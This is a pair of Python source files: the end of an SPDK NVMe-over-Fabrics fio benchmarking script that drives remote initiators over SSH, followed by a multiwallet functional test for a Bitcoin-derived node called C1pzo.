fh.write(out)
class Initiator(Server):
def __init__(self, name, username, password, mode, nic_ips, ip, transport="rdma", nvmecli_dir=None, workspace="/tmp/spdk"):
super(Initiator, self).__init__(name, username, password, mode, nic_ips, transport)
self.ip = ip
self.spdk_dir = workspace
if nvmecli_dir:
self.nvmecli_bin = os.path.join(nvmecli_dir, "nvme")
else:
self.nvmecli_bin = "nvme" # Use system-wide nvme-cli
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.remote_call("sudo rm -rf %s/nvmf_perf" % self.spdk_dir)
self.remote_call("mkdir -p %s" % self.spdk_dir)
def __del__(self):
self.ssh_connection.close()
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def remote_call(self, cmd):
stdin, stdout, stderr = self.ssh_connection.exec_command(cmd)
out = stdout.read().decode(encoding="utf-8")
err = stderr.read().decode(encoding="utf-8")
return out, err
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
stdout, stderr = self.remote_call("ls %s/nvmf_perf" % self.spdk_dir)
file_list = stdout.strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t %s" % self.transport,
"-s %s" % (4420 + subsys_no),
"-a %s" % ip]
nvme_discover_cmd = " ".join(nvme_discover_cmd)
stdout, stderr = self.remote_call(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
return subsystems
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
iodepth={io_depth}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
"""
if "spdk" in self.mode:
subsystems = self.discover_subsystems(self.nic_ips, subsys_no)
bdev_conf = self.gen_spdk_bdev_conf(subsystems)
self.remote_call("echo '%s' > %s/bdev.conf" % (bdev_conf, self.spdk_dir))
ioengine = "%s/examples/bdev/fio_plugin/fio_plugin" % self.spdk_dir
spdk_conf = "spdk_conf=%s/bdev.conf" % self.spdk_dir
filename_section = self.gen_fio_filename_conf(subsystems)
else:
ioengine = "libaio"
spdk_conf = ""
filename_section = self.gen_fio_filename_conf()
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
io_depth=io_depth, ramp_time=ramp_time, run_time=run_time)
if num_jobs:
fio_config = fio_config + "numjobs=%s" % num_jobs
fio_config = fio_config + filename_section
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.remote_call("mkdir -p %s/nvmf_perf" % self.spdk_dir)
self.remote_call("echo '%s' > %s/nvmf_perf/%s" % (fio_config, self.spdk_dir, fio_config_filename))
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
cmd = "sudo /usr/src/fio/fio %s --output-format=json --output=%s" % (fio_config_file, output_filename)
output, error = self.remote_call(cmd)
self.log_print(output)
self.log_print(error)
else:
output_filename = job_name + "_" + self.name + ".json"
cmd = "sudo /usr/src/fio/fio %s --output-format=json --output=%s" % (fio_config_file, output_filename)
output, error = self.remote_call(cmd)
self.log_print(output)
self.log_print(error)
self.log_print("FIO run finished. Results in: %s" % output_filename)
class KernelTarget(Target):
def __init__(self, name, username, password, mode, nic_ips,
use_null_block=False, sar_settings=None, transport="rdma", nvmet_dir=None, **kwargs):
super(KernelTarget, self).__init__(name, username, password, mode, nic_ips,
transport, use_null_block, sar_settings)
if nvmet_dir:
self.nvmet_bin = os.path.join(nvmet_dir, "nvmetcli")
else:
self.nvmet_bin = "nvmetcli"
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_nullblock_conf(self, address):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": "/dev/nullb0",
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": 1
}
],
"nqn": "nqn.2018-09.io.spdk:cnode1"
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": address,
"trsvcid": "4420",
"trtype": "%s" % self.transport,
},
"portid": 1,
"referrals": [],
"subsystems": ["nqn.2018-09.io.spdk:cnode1"]
})
with open("kernel.conf", 'w') as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IP's
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(address_list))]
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": "nqn.2018-09.io.spdk:cnode%s" % subsys_no
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": ["nqn.2018-09.io.spdk:cnode%s" % subsys_no]
})
subsys_no += 1
port_no += 1
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
pass
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
if len(self.nic_ips) > 1:
print("Testing with null block limited to single RDMA NIC.")
print("Please specify only 1 IP address.")
exit(1)
self.subsys_no = 1
self.kernel_tgt_gen_nullblock_conf(self.nic_ips[0])
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, username, password, mode, nic_ips, num_cores, num_shared_buffers=4096,
use_null_block=False, sar_settings=None, transport="rdma", **kwargs):
super(SPDKTarget, self).__init__(name, username, password, mode, nic_ips, transport, use_null_block, sar_settings)
self.num_cores = num_cores
self.num_shared_buffers = num_shared_buffers
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
numa_list = get_used_numa_nodes()
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport, num_shared_buffers=self.num_shared_buffers)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.get_nvmf_transports(self.client))
if self.null_block:
nvme_section = self.spdk_tgt_add_nullblock()
subsystems_section = self.spdk_tgt_add_subsystem_conf(self.nic_ips, req_num_disks=1)
else:
nvme_section = self.spdk_tgt_add_nvme_conf()
subsystems_section = self.spdk_tgt_add_subsystem_conf(self.nic_ips)
self.log_print("Done configuring SPDK NVMeOF Target")
def spdk_tgt_add_nullblock(self):
self.log_print("Adding null block bdev to config via RPC")
rpc.bdev.construct_null_bdev(self.client, 102400, 4096, "Nvme0n1")
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.construct_nvme_bdev(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(1, req_num_disks + 1)
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % (c - 1)
rpc.nvmf.nvmf_subsystem_create(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client, nqn,
trtype=self.transport,
traddr=ip,
trsvcid="4420",
adrfam="ipv4")
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.get_nvmf_subsystems(self.client))
def tgt_start(self):
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "app/nvmf_tgt/nvmf_tgt")
command = " ".join([nvmf_app_path, "-m", self.num_cores])
proc = subprocess.Popen(command, shell=True)
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
self.spdk_tgt_configure()
def __del__(self):
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, username, password, mode, nic_ips, ip, transport, **kwargs):
super(KernelInitiator, self).__init__(name, username, password, mode, nic_ips, ip, transport)
def __del__(self):
self.ssh_connection.close()
def kernel_init_connect(self, address_list, subsys_no):
subsystems = self.discover_subsystems(address_list, subsys_no)
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in subsystems:
self.log_print("Trying to connect %s %s %s" % subsystem)
self.remote_call("sudo %s connect -t %s -s %s -n %s -a %s -i 8" % (self.nvmecli_bin, self.transport, *subsystem))
time.sleep(2)
def kernel_init_disconnect(self, address_list, subsys_no):
subsystems = self.discover_subsystems(address_list, subsys_no)
for subsystem in subsystems:
self.remote_call("sudo %s disconnect -n %s" % (self.nvmecli_bin, subsystem[1]))
time.sleep(1)
def gen_fio_filename_conf(self):
out, err = self.remote_call("lsblk -o NAME -nlp")
nvme_list = [x for x in out.split("\n") if "nvme" in x]
filename_section = ""
for i, nvme in enumerate(nvme_list):
filename_section = "\n".join([filename_section,
"[filename%s]" % i,
"filename=%s" % nvme])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, username, password, mode, nic_ips, ip, num_cores=None, transport="rdma", **kwargs):
super(SPDKInitiator, self).__init__(name, username, password, mode, nic_ips, ip, transport)
if num_cores:
self.num_cores = num_cores
def install_spdk(self, local_spdk_zip):
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.remote_call("unzip -qo /tmp/spdk_drop.zip -d %s" % self.spdk_dir)
self.log_print("Sources unpacked")
self.remote_call("cd %s; git submodule update --init; ./configure --with-rdma --with-fio=/usr/src/fio;"
"make clean; make -j$(($(nproc)*2))" % self.spdk_dir)
self.log_print("SPDK built")
self.remote_call("sudo %s/scripts/setup.sh" % self.spdk_dir)
def gen_spdk_bdev_conf(self, remote_subsystem_list):
header = "[Nvme]"
row_template = """ TransportId "trtype:{transport} adrfam:IPv4 traddr:{ip} trsvcid:{svc} subnqn:{nqn}" Nvme{i}"""
bdev_rows = [row_template.format(transport=self.transport,
svc=x[0],
nqn=x[1],
ip=x[2],
i=i) for i, x in enumerate(remote_subsystem_list)]
bdev_rows = "\n".join(bdev_rows)
bdev_section = "\n".join([header, bdev_rows])
return bdev_section
def gen_fio_filename_conf(self, remote_subsystem_list):
subsystems = [str(x) for x in range(0, len(remote_subsystem_list))]
# If num_cpus exists then limit FIO to this number of CPUs
# Otherwise - each connected subsystem gets its own CPU
if hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
threads = range(0, len(subsystems))
n = int(len(subsystems) / len(threads))
filename_section = ""
for t in threads:
header = "[filename%s]" % t
disks = "\n".join(["filename=Nvme%sn1" % x for x in subsystems[n * t:n + n * t]])
filename_section = "\n".join([filename_section, header, disks])
return filename_section
if __name__ == "__main__":
spdk_zip_path = "/tmp/spdk.zip"
target_results_dir = "/tmp/results"
if (len(sys.argv) > 1):
config_file_path = sys.argv[1]
else:
script_full_dir = os.path.dirname(os.path.realpath(__file__))
config_file_path = os.path.join(script_full_dir, "config.json")
print("Using config file: %s" % config_file_path)
with open(config_file_path, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
for k, v in data.items():
if "target" in k:
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(name=k, **data["general"], **v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(name=k, **data["general"], **v)
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(name=k, **data["general"], **v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(name=k, **data["general"], **v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
else:
continue
# Copy and install SPDK on remote initiators
target_obj.zip_spdk_sources(target_obj.spdk_dir, spdk_zip_path)
threads = []
for i in initiators:
if i.mode == "spdk":
t = threading.Thread(target=i.install_spdk, args=(spdk_zip_path,))
threads.append(t)
t.start()
for t in threads:
t.join()
target_obj.tgt_start()
# Poor mans threading
# Run FIO tests
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect(i.nic_ips, target_obj.subsys_no)
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(target_results_dir, sar_file_name))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect(i.nic_ips, target_obj.subsys_no)
i.copy_result_files(target_results_dir)
target_obj.parse_results(target_results_dir)
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The C1pzo Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a c1pzod node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import C1pzoTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(C1pzoTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another c1pzod?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another c1pzod?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
